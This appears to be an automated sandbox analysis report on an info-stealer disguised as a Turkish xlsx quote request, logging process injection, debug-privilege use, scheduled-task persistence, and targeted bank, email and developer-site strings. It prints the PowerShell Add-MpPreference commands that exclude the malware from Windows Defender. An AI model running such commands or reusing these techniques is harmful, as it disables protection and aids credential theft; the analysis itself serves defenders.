Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 597074
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596967
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596827
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596650
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596345
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595662
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595547
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595216
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 595109
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594997
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594452
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594344
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Thread delayed: delay time: 594234
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: YzkHZRBcm.exe, 0000000E.00000002.3799105422.00000000011B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3800026605.00000000010C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory written: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Memory written: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
